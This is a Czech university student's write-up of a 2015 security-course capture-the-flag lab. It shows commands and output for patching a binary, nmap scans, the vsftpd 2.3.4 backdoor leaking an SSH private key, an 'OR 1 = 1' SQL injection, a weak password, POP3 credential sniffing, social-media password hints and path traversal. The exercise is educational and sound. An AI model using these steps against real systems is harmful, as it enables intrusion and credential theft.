VUT Brno Fakulta informačních technologií Bezpečnost informačních systémů (BIS) 2015/2016 Projekt 1 Mystery of BIS František Němec (xnemec61@stud.fit.vutbr.cz) 2. prosince 2015 1 Smithovo tajemství (A) Přihlásím se přes ssh s privátním klíčem. [stud@xnemec61 ~]$ cd.. [stud@xnemec61 ~]$ ls smith stud Další uživatel smith, ten bude důležitý. Co ta binárka zsnes. [stud@xnemec61 ~]$ strings zsnes I m only a dummy for BIS project (naznačuje, že soubor bude důležitý) su - smith (zase smith, to je náhoda a dokonce su) Dekompiluji kód pomocí Boomerang 1. V jedné větvi je volání system(), tak ho zkusím vyvolat. } else { system(); eax = 0; } } else { Zkusím to pustit přes debugger. Nejprve z objdump zjistím na jakou adresu skočit. $ objdump -d zsnes 804869f: 74 13 je 80486b4 <main+0x1e0> 80486a1: c7 04 24 8b 8a 04 08 movl $0x8048a8b,(%esp) 80486a8: e8 0b fd ff ff call 80483b8 <system@plt> 80486ad: b8 00 00 00 00 mov $0x0,%eax $ gdb zsnes $(gdb) break main $(gdb) run $(gdb) set $pc = 0x80486a1 $(gdb) n su: uživatel smith neexistuje 1 http://boomerang.sourceforge.net/ 1
Dobrý, ale budu muset upravit binárku a tu spustit přímo na serveru. Z objdumpu zjistím, kde v binárce začíná main a kde se nachází volaní system(). Všechno od začátku po movl před volaním system() přeskočím (vložením NOPů). Zkopíruji upravenou binárku na server a spustím. Jsem přihlášen jako smith s prvním tajemstvím a přístupu k nmap. Později jsem zjistil, že stačí použít su - smith a složitý postup uvedený výše byl zbytečný. [smith@xnemec61 ~]$ ls sectet.txt nmap [smith@xnemec61 ~]$ cat secret.txt Ziskali jste tajemstvi "A:17:11:02:00:01:0cd279c7d8 2 Mapování sítě (NMap) Zjištění adresy sítě: [smith@xnemec61 ~]$ ifconfig inet addr:192.168.122.205 Bcast:192.168.122.255 Mask:255.255.255.0 Mapování sítě: [smith@xnemec61 ~]$ sudo nmap -sp 192.168.122.0/24 Příliš mnoho výpisů s připojenými uživateli. Zajímavě vypadají výpisy s ptest. [smith@xnemec61 ~]$ sudo nmap -sp 192.168.122.0/24 grep ptest Nmap scan report for ptest3.local (192.168.122.50) Nmap scan report for ptest1.local (192.168.122.54) Nmap scan report for ptest2.local (192.168.122.98) Nmap scan report for ptest4.local (192.168.122.230) Mapování služeb jednotlivých serverů: [smith@xnemec61 ~]$ sudo nmap -ss -sv 192.168.122.50 [smith@xnemec61 ~]$ sudo nmap -ss -sv 192.168.122.54 21/tcp open ftp vsftpd 2.3.4 3306/tcp open mysql MySQL (unauthorized) [smith@xnemec61 ~]$ sudo nmap -ss -sv 192.168.122.98 110/tcp open pop3 Dovecot pop3d 55555/tcp open http Apache httpd [smith@xnemec61 ~]$ sudo nmap -ss -sv 192.168.122.230 2
3 FTP backdoor (B) Server ptest1 provozuje ftp s backdoorem 2. Připojení přes telnet: [smith@xnemec61 ~]$ telnet 192.168.122.54 21 Trying 192.168.122.54 Connected to 192.168.122.54. 220 (vsftpd 2.3.4) USER x:) 331 Please specify the password. PASS 220 Opened port 58874, take a look ;) telnet 192.168.122.54 58874 Trying 192.168.122.54 Connected to 192.168.122.54. -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAxXRaP2hoSg1twOly6p7VMILraMxWNEjj6ZS17gOZysyy42OI bwxhkamuwh+ikmssrnkqm3mssobrmelrq2p1afiq8pnffihka9lq2h+njwallbz6 EBbW8ACoREMr4QxLFqRzHFCdady/nrmIxZIfiZ7mkA3K5IvApWIhs43SHzMhFAEI ZUuvciHkkGYlNckBUbTA6+ox9ThSNlwb+ILrF7DGJelE4GjfdMkDFQ== -----END RSA PRIVATE KEY----- 500 OOPS: Bye Bye. Connection closed by foreign host. Privátní klíč použiji k ssh připojení k nějakému serveru ptest1 funguje: [stud@xnemec61 ~]$ ssh -4 -i id_rsa_54 smith@ptest1 Welcome smith! Last login: Tue Nov 24 12:36:56 2015 from xsarca00.local [smith@ptest1 ~]$ ls file.pcap secret.txt tcpdump telnet [smith@ptest1 ~]$ cat secret.txt Ziskali jste tajemstvi "B:24:11:12:57:01:376a6bcb68" 4 SQL injection (C) Připojení k http serveru ptest1: [stud@xnemec61 ~] elinks http://ptest1 Použití loginu ibreiten@fit.vutbr.cz a hesla OR 1 = 1: Ziskali jste tajemstvi "C:24:11:14:37:01: 1355934b75" 5 Slabé heslo (D) Připojení k http serveru ptest2 (tentokrát na nestandardní port). [stud@xnemec61 ~]$ elinks http://ptest2:55555 Použítí loginu admin a hesla 123456. Ziskali jste tajemstvi "D:24:11:17:09:01: 62e18d7bb2" 2 https://xorl.wordpress.com/2011/07/05/vsftpd-2-3-4-backdoor/ 3
6 Odchycení POP3 přihlašovacích údajů (E) Analýza POP3 paketů co běhají po sítí: [smith@ptest1 ~]$ sudo tcpdump -X port pop3 18:17:43.854819 IP ptest1.local.39432 > ptest2.local.pop3: Flags [P.], seq 7:19, 0x0000: 4500 0040 2ed0 4000 4006 95fe c0a8 7a36 E..@..@.@..z6 0x0010: c0a8 7a62 9a08 006e 0694 b99d a7e1 91d2..zbn.. 0x0020: 8018 0391 3633 0000 0101 080a 6dd3 9769.63m..i 0x0030: 6dba 15b3 5553 4552 2073 6d69 7468 0d0a muser.smith.. 18:17:43.855384 IP ptest1.local.39432 > ptest2.local.pop3: Flags [P.], seq 19:34, 0x0000: 4500 0043 2ed1 4000 4006 95fa c0a8 7a36 E..C..@.@..z6 0x0010: c0a8 7a62 9a08 006e 0694 b9a9 a7e1 91d7..zbn.. 0x0020: 8018 0391 c9f2 0000 0101 080a 6dd3 976a m..j 0x0030: 6dba 15b4 5041 5353 2071 4277 5a48 7a4c mpass.qbwzhzl 0x0040: 310d 0a 1.. Připojení k POP3 serveru s odchytnutým loginem a heslem (v emailu se nachází tajemství E): [stud@xnemec61 ~]$ telnet ptest2 pop3 Trying 192.168.122.98 Connected to ptest2. +OK Dovecot ready. USER smith +OK PASS qbwzhzl1 +OK Logged in. LIST +OK 1 messages: 1 505. RETR 1 +OK 505 octets Return-Path: <root@bis-ptest2.bis.com> X-Original-To: smith@localhost Delivered-To: smith@localhost.bis.com Received: by BIS-ptest2.bis.com (Postfix, from userid 0) id 433495C10; Tue, 3 Nov 2015 20:43:11 +0100 (CET) Message-Id: <20151103194311.433495C10@BIS-ptest2.bis.com> Date: Tue, 3 Nov 2015 20:43:11 +0100 (CET) From: root@bis-ptest2.bis.com (root) To: undisclosed-recipients:; Ziskali jste tajemstvi "E:03:11:20:43:01:d4fbac02b5". 7 Sociální sít (F) Připojení k ptest3 http serveru: [stud@xnemec61 ~]$ elinks http://ptest3 Jeden z doktorandů napsal zajímavý článek: Maroš Barabas @ibarabas Zajímavost z hackingu: Víte kolik informací se dá zjistit o lidech na jejich sociálních sítích? Lidé mnohokrát napíšou i svá hesla. :) 4
Zkusím najít doktorandy na facebooku. Maros Barabas 3 má něco užitečného: Ak hladate nejake info, skuste @fitbis. Ak tomu nerozumiete, nekomentujte. Dakujem. Použití @ před fitbis ukazuje na Twitter 4. Ak ste sa dostali az sem, tak asi hladate nejake info: Vlam sa Abdulah, mam hnede oci, 126cm (v obvode) a moj pes sa vola Charlie. Zkusím se připojit jako některý z doktorandů. Uživatel ibarabas poskytl nápovědu hesla. Invalid password! Hint: Jmeno meho psa Vstup do sítě doktorandů s loginem ibarabas a heslem charlie: Ziskali jste tajemstvi "F:28:11:13:40:01: f3706520fb" 8 Path traversal (G) Připojení na ptest4 http server: [stud@xnemec61 ~] elinks http://ptest4 http://192.168.122.230/index.php?dir=/home/data/web/shared Vstup do home adresáře serveru (přes elinks): http://192.168.122.230/index.php?dir=/home/ data martin pavel radek V Radkově složce se nachází tajemství http://192.168.122.230/index.php?dir=/home/radek/secret.txt Ziskali jste tajemstvi "G:24:11:18:52:01:9739dafa6f" 9 PDF metadata (I) V Pavlově složce se nachází zajímavý email spolu s pdf dokumentem: http://192.168.122.230/index.php?file=/home/pavel/1445685669.vfd00i5a3fm694032.unknown:2,s Ahoj, dokoncil jsem ten dokument. Posilam ti ho v priloze. V textu neni zadna informace, ktera by vedla k tomu, ze jsem to psal ja, tak jak jsme se domluvili. Pro jistotu to ale zkontroluj. Samotný obsah pdf dokumentu není zajímavý, ale metadata už jsou zajímavější zejména klíčová slova. http://192.168.122.230/index.php?file=/home/pavel/document.pdf /Keywords(Ziskali jste tajemstvi "I:03:11:13:13:35:a283eae6d3") 3 https://www.facebook.com/mbarabas 4 http://www.twitter.com/fitbis 5